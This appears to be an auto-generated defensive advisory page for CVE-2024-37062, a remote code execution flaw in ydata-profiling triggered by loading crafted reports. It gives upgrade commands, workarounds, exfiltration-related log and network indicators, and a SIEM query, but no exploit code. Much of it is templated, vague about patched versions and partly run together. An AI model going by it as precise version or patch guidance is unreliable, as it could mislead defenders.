CVE-2024-37062
📋 TL;DR
This vulnerability in ydata-profiling library allows remote code execution when a maliciously crafted report is loaded. Attackers can execute arbitrary code on systems running vulnerable versions. Users of ydata-profiling 3.7.0 or newer who load untrusted profiling reports are affected.
💻 Affected Systems
- ydata-profiling
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise with attacker gaining full control over the affected system, data exfiltration, and lateral movement within the network.
Likely Case
Data theft, installation of malware or backdoors, and potential privilege escalation on the compromised system.
If Mitigated
Limited impact with proper input validation and sandboxing, potentially only denial of service or limited data exposure.
🎯 Exploit Status
Exploitation requires the victim to load a malicious profiling report, which could be delivered via phishing or compromised data sources.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific patched version
Vendor Advisory: https://hiddenlayer.com/sai-security-advisory/ydata-june2024
Restart Required: No
Instructions:
1. Check current ydata-profiling version
2. Update to patched version via pip: pip install --upgrade ydata-profiling
3. Verify update with: pip show ydata-profiling
🔧 Temporary Workarounds
Restrict report sources
allOnly load profiling reports from trusted, verified sources
Input validation
allImplement strict validation of profiling report files before processing
🧯 If You Can't Patch
- Implement network segmentation to isolate systems using ydata-profiling
- Deploy application allowlisting to prevent execution of unauthorized code
🔍 How to Verify
Check if Vulnerable:
Check ydata-profiling version with: pip show ydata-profiling | grep VersionCheck Version:
pip show ydata-profiling | grep VersionVerify Fix Applied:
Confirm version is below 3.7.0 or updated to patched version📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from ydata-profiling context
- Failed deserialization attempts
- Unexpected network connections from profiling processes
Network Indicators:
- Outbound connections to suspicious IPs after report processing
- Unusual data exfiltration patterns
SIEM Query:
process.name: "python" AND process.args: "ydata-profiling" AND event.action: "process_start"